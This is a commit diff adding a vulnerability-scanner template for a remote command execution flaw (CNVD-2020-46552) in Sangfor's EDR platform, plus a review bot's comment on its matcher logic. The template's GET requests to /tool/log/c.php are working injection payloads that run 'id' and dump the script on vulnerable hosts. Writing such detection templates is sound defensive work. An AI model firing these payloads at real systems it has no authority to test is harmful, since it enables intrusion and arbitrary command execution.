Create CNVD-2020-46552.yaml
parent
e58bae51ca
commit
1cb764709e
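--- /dev/null
+++ b/CNVD-2020-46552.yaml
@@ -0,0 +1,35 @@
+id: CNVD-2020-46552
+info:
+name: Sangfor EDR Tool RCE
+author: ritikchaddha
+severity: critical
+description: There is a RCE vulnerability in Sangfor Endpoint Monitoring and Response Platform (EDR). An attacker could exploit this vulnerability by constructing an HTTP request, and an attacker who successfully exploited this vulnerability could execute arbitrary commands on the target host.
+reference:
+- https://www.modb.pro/db/144475
+- https://blog.csdn.net/bigblue00/article/details/108434009
+- https://cn-sec.com/archives/721509.html
+tags: cnvd,cnvd2020,sangfor,rce
+
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=id"
+- "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php"
+
+matchers-condition: or
+matchers:
+- type: word
+part: body
+words:
+- "$show_input = function($info)"
+- "$strip_slashes($host)"
+condition: and
+
+- type: word
+part: body
+words:
+- "uid=0(root)"
+
+- type: status
+status:
+- 200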
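Review bot: The `type: status` matcher for `200`, combined with `matchers-condition: or`, makes the template fire on any host that answers 200 on either path, even when the body shows no sign of the vulnerable script. A catch-all page or generic landing page would therefore be reported as a critical RCE. The status check should gate the body evidence rather than stand alone: drop `matchers-condition: or` and replace the three matchers with a single `type: dsl` matcher whose expression is `status_code == 200 && (contains(body, "uid=0(root)") || (contains(body, "$show_input = function($info)") && contains(body, "$strip_slashes($host)")))`. Separately, the `uid=0(root)` word only matches when the service runs as root, so a comment above that matcher stating this assumption would help whoever triages a missed detection.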